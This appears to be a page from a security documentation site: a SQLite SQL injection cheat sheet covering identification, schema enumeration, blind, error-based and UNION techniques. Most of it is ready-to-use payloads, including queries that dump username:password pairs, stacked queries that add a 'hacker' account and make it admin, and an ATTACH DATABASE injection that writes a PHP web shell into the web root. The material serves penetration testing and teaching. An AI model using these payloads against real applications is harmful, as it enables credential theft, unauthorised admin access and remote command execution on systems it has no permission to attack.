> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Cheat Sheet — SQLite

> SQLite SQL injection cheat sheet: syntax, enumeration, file access, and RCE via ATTACH DATABASE.

## Identification

```sql theme={"dark"}
SELECT sqlite_version()
-- Comment: -- or /* */
-- String concat: 'a'||'b'
-- No user system, no privileges
```

***

## Information Gathering

```sql theme={"dark"}
SELECT sqlite_version()
SELECT typeof(1)                         -- Confirm SQLite
```

***

## Enumerate Tables

```sql theme={"dark"}
SELECT name FROM sqlite_master WHERE type='table'
SELECT group_concat(name) FROM sqlite_master WHERE type='table'
SELECT sql FROM sqlite_master WHERE type='table'     -- Shows CREATE TABLE
```

***

## Enumerate Columns

```sql theme={"dark"}
SELECT sql FROM sqlite_master WHERE type='table' AND name='users'
PRAGMA table_info(users)
```

`sql` column shows full `CREATE TABLE` statement with all column names and types.

***

## Dump Data

```sql theme={"dark"}
SELECT group_concat(username||':'||password, char(10)) FROM users
SELECT username||':'||password FROM users
```

***

## String Functions

| Function                | Description           |
| ----------------------- | --------------------- |
| `\|\|`                  | Concatenate           |
| `SUBSTR(str,pos,len)`   | Substring             |
| `LENGTH(str)`           | String length         |
| `UNICODE(char)`         | Unicode code point    |
| `CHAR(n)`               | Char from code point  |
| `UPPER(str)`            | Uppercase             |
| `LOWER(str)`            | Lowercase             |
| `REPLACE(str,old,new)`  | Replace               |
| `TRIM(str)`             | Trim whitespace       |
| `HEX(str)`              | Hex encode            |
| `ZEROBLOB(n)`           | N zero bytes          |
| `GROUP_CONCAT(col)`     | Aggregate concat      |
| `GROUP_CONCAT(col,sep)` | Concat with separator |

***

## Conditional

```sql theme={"dark"}
CASE WHEN condition THEN true_val ELSE false_val END
IIF(condition, true_val, false_val)        -- 3.32+
```

***

## Time Delay

SQLite has no sleep function. Alternatives:

```sql theme={"dark"}
-- Heavy computation
AND 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000))))

-- Adjust RANDOMBLOB size for delay length
```

***

## Error-Based

SQLite error messages are less verbose. Limited error-based:

```sql theme={"dark"}
AND 1=CAST((SELECT group_concat(name) FROM sqlite_master) AS int)
```

***

## UNION

```sql theme={"dark"}
' UNION SELECT 1,2,3-- -
' UNION SELECT 1,group_concat(name),3 FROM sqlite_master WHERE type='table'-- -
' UNION SELECT 1,group_concat(username||':'||password),3 FROM users-- -
```

***

## File Write — ATTACH DATABASE

```sql theme={"dark"}
'; ATTACH DATABASE '/var/www/html/shell.php' AS pwn; CREATE TABLE pwn.cmd (data text); INSERT INTO pwn.cmd VALUES ('<?php system($_GET["cmd"]); ?>');-- -
```

Writes PHP web shell as SQLite database file (contains payload in binary).

***

## Boolean Blind

```sql theme={"dark"}
' AND SUBSTR((SELECT name FROM sqlite_master LIMIT 1),1,1)='u'-- -
' AND UNICODE(SUBSTR((SELECT name FROM sqlite_master LIMIT 1),1,1))>100-- -
```

***

## Stacked Queries

Supported depending on driver:

```sql theme={"dark"}
'; INSERT INTO users VALUES ('hacker','pass');-- -
'; UPDATE users SET role='admin' WHERE username='hacker';-- -
```

***

## No information\_schema

SQLite uses `sqlite_master` instead:

| Query                                               | Purpose               |
| --------------------------------------------------- | --------------------- |
| `SELECT name FROM sqlite_master WHERE type='table'` | List tables           |
| `SELECT sql FROM sqlite_master WHERE name='tbl'`    | Show CREATE statement |
| `PRAGMA table_info(tbl)`                            | Column info           |
| `PRAGMA database_list`                              | Attached databases    |

***

## Type System

SQLite uses dynamic typing — any column accepts any type. No strict type enforcement. This means:

* CAST errors are less common
* Type-based detection may not work
* No need to match column types in UNION

***

## Sources

* [PortSwigger — SQL Injection Cheat Sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)
* [PentestMonkey — SQLite SQL Injection Cheat Sheet](https://pentestmonkey.net/cheat-sheet/sql-injection/sqlite-sql-injection-cheat-sheet)
* [SQLite — Core Functions](https://www.sqlite.org/lang_corefunc.html)
* [OWASP — SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
* [PayloadsAllTheThings — SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md)
